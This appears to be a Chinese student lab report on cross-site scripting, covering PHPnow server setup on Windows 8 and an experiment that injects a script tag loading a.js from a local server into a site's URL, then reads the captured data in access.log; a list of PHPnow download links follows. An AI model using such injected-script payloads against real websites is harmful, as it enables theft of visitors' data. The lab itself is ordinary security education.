实验背景:
从Wikipedia搜索跨站脚本,解释到跨区脚本(Cross-zone Scripting或者Cross Site Scripting)是指浏览器利用浏览器一些有漏洞的安全解决方案,这种攻击使没有权限跨站脚本在未经授权的情况下以较高的权限去执行,脚本的执行权限被客户端(Web浏览器)扩大升级了。
这些XSS跨站脚本漏洞可能是:
*网页浏览器设计缺陷使得在一定的条件下,一个站点完全信任另外一个高权限的站点(或者连个高低权限区域)并去执行高权限站点的脚本。
*网页浏览器配置错误,把不安全的网站放在浏览器高信任列表。
*信任站点(特权区域)存在跨站脚本漏洞
一般的跨站脚本攻击包含两个步骤。首先是利用跨站脚本漏洞以一个特权模式去执行攻击者构造的脚本,然后利用不安全的ActiveX控件执行恶意的行为。通常在安静模式让计算机浏览攻击者指定的网页悄悄下载安装各种恶意代码,如间谍软件、木马软件、蠕虫等。
实验环境:
PHO NOW环境的搭建
对于绝大多数同学来说,这个PHPNOW环境的搭建并不是一件非常困难的事情,这取决于同学们所使用的操作系统。对于WIN 8或者 WIN8.1的同学来说,这就是需要注意的一个问题。
一般来说,有这么几种问题:
一、 很多同学以前曾经装过PHPNOW或者错误的安装过,之后又直接删除掉了整个文件夹。这样会有残留的注册表项或者子进程一直在后台运行,此时需要强行卸载。方法是使用PHPNOW文件夹下面的pncp.cmd,选择33。强行终止进程并卸载,这样就可以完整的卸载掉整个软件,之后可以重新安装
二、 第二种问题,就是但对于使用win8或者win8.1的同学们来说经常会遇到的问题。会出现两条原因:一条是服务器名已经被使用,一条是需要管理员权限,在这里我们使用如下的解决方法:
a) 一是强行卸载之后,重新启动计算机再做尝试
b) 二是在计算机右下角右击->命令提示符(管理员),在打开的cmd窗口中进入到PHPNOW的文件夹目录之下,运行setup.cmd,这个时候再根据提示进行就可以安装完成。操作步骤和linux下类似,非常简单,就不再赘述。
这里要切记设置好自己的密码,不要忘记,之后就完成了整个软件的安装。
参考From: http://jingyan.baidu.com/article/cb5d61050c9ce6005d2fe040.html
实验过程:
打开浏览器,输入127.0.0.1,打开
输入127.0.0.1/a.js,出现如下界面
打开之前找到的网址
改掉后面的内容,输入
<script src="http://127.0.0.1/a.js"></script>
可以在access.log里面得到这样的内容,由于网站会自行转码,所以无法直接阅读,需要进一步的转码才可以
<!--EndFragment-->
相关推荐
PHPnow搭建php环境.doc
PHPnow搭建php环境.pdf
PHPnow快速搭建,配置php环境 PHPnow 是 Win32 下绿色免费的 Apache + PHP + MySQL 环境套件包。全部所需的东西都已为你准备好了,欢迎随时下载享用。全部使用 cmd + php 命令行脚本,不对任何部分加密,完全开放...
简易安装、快速搭建支持虚拟主机的PHP环境。附带PnCp.cmd控制面板,帮助你快速配置你的套件,使用非常方便。
本图解中提供最新的phpnow下载链接,并且详细介绍phpnow在window XP和windows 7下的安装
PHPnow搭建php环境.docx
...本人也是花了一天的时间终于找到了这个软件,不敢独享,决定共享之!下面的一些东西也是我从网上搜集的,希望跟新转型的朋友们一起探讨。...PHPnow 就这样应运而生,为你快速搭建专业的虚拟主机。
php网站所需工具,架构php 网站,使用 PHPnow 搭建 PHP 环境 [图].
phpnow建站指南,不会用phpnow的看下就明白了。
如何配置php环境,PHPnow快速搭建(3)分享.pdf
简易安装、快速搭建支持虚拟主机的 PHP 环境。 附带 PnCp.cmd 控制面板,帮助你快速配置你的套件,使用非常方便。 安装 PHPnow 只需解压、初始化,就可得到一个标准的 PHP + MySQL 的服务器环境。 然后就可以直接...
基于PHPnow 1.5.6的一键php环境搭建 讲解: http://blog.csdn.net/shuai825644975/article/details/16963329
phpnow搭建的环境,适合php的多地址访问,其中c盘下的host文件要自己修改。
PHPnow 环境PHPnow 环境PHPnow 环境PHPnow 环境PHPnow 环境
PHPnow 的特点是全部使用 cmd vbs 脚本,完全开放自由,你完全可以自己修改里面的脚本。支持虚拟主机;便捷的虚拟主机管理 虚拟主机代理;可与 IIS 共存 80 端口 可扩展脚本设计;方便增加功能,功能转换 PHPnow...
PHPnow 1.4.5 (Apache 2.0) 更多信息请访问 http://www.phpnow.org 安装使用 解压后,执行 Init.cmd 进行初始化。成功初始化后 Init.cmd 自动改名为 Init.cm_。 如果必要,可以将其改会 Init.cmd 并执行重新...
phpnow 1.7.6 ,在1.5.1上升级而来。 采用APACHE2.2+mysql5.8+php7构成环境包
简易安装、快速搭建支持虚拟主机的 PHP 环境。附带 PnCp.cmd 控制面板,帮助你快速配置你的套件,使用非常方便。 PHPnow 是绿色的,解压后执行 Setup.cmd 初始化,即可得到一个 PHP + MySQL 环境。 然后就可以直接...
PHPnow-1.5.5_1.zip是一款可以快速搭建php+mysql的软件